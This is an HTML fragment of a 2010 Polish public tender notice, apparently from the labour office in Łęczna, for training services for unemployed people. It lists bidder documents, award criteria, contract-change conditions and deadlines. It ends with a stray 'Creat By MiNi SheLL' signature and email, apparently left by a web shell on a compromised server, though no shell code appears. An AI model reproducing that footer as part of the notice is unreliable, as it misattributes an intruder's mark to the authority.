<p style="margin: 0px; padding: 0px;">1.	Oświadczenie z art. 22 ust. 1 - załącznik nr 2 do SIWZ
2.	Oświadczenie z art. 24 - załącznik nr 3 do SIWZ
3.	Aktualny odpis z właściwego rejestru lub oświadczenie z art. 24 ust. 1 pkt 2 - załącznik nr 4 do SIWZ.
4.	Kwestionariusz szkolenia - załącznik nr 5 do SIWZ/ wypełniony oddzielnie dla każdej części/
5.	Wykaz kadry (z wyszczególnieniem na kadrę podstawową i rezerwową), która będzie uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia - załącznik nr 6 i 7 do SIWZ./ wypełniony oddzielnie dla każdej części/
6.	Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia, a jeśli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym tj. sali, narzędziach, urządzeniach i osobach zdolnych do wykonania zamówienia pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załącznik nr 8 do SIWZ / wypełniony oddzielnie dla każdej części/.
7.	Wykaz wykonanych w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej usługi szkoleniowej o tematyce zgodnej z przedmiotem zamówienia w danej części wraz z podaniem jej wartości, dat wykonania, odbiorców i przedstawi dokument na potwierdzenie, że usługi wszystkie wskazane w wykazie zostały wykonane należycie - załącznik nr 9 do SIWZ.
8.	Zaparafowany przez Wykonawcę wzór umowy - załącznik nr 10 do SIWZ
9.	Formularz cenowy - załącznik nr 11 do SIWZ /wypełniony oddzielnie dla każdej części/.
10.	Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia 
i uzyskanie kwalifikacji.
11.	Opracowany wzór ankiety dla uczestników szkolenia służącej do oceny szkolenia.
12.	Opracowany i wykorzystywany przez Wykonawcę dokument potwierdzający zapewnienie nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonego szkolenia. 
13.	Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy Wojewódzki Urząd Pracy oraz informacje o kontynuowaniu działalności szkoleniowej w 2010r.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może ulec zmianie w przypadku zmniejszenia liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego i będącego wynikiem:
a)	niestawienia się kandydata na szkolenie pomimo wydania skierowania na szkolenie,
b)	przerwania uczestnictwa w szkoleniu (np. podjęcie zatrudnienia lub innej pracy zarobkowej, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy,
c)	nie podjęcia szkolenia po wydaniu skierowania,
d)	w umowie stosownie do  postanowień pkt. 2 ppkt. a), b) i c) SIWZ ulega przeliczeniu koszt szkolenia. W takim przypadku koszt szkolenia stanowi iloczyn kosztu szkolenia jednej osoby bezrobotnej oraz rzeczywistej ilości osób bezrobotnych. Wysokość kosztów ustala się proporcjonalnie do okresu szkolenia, w którym uczestniczyły osoby bezrobotne. Koszt szkolenia ulega obniżeniu o dniówki żywieniowe za osoby nieobecne na szkoleniu.
Umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności ze strony Wykonawcy:
a)	zmiana miejsca wykonywania zamówienia pod warunkiem, że nowe miejsce wykonania zamówienia zlokalizowane będzie zgodnie z warunkami wskazanymi w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.leczna.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
Al. Jana Pawła II 95
21-010 Łęczna
pok. 110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy
Al. Jana Pawła II 95
21-010 Łęczna sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com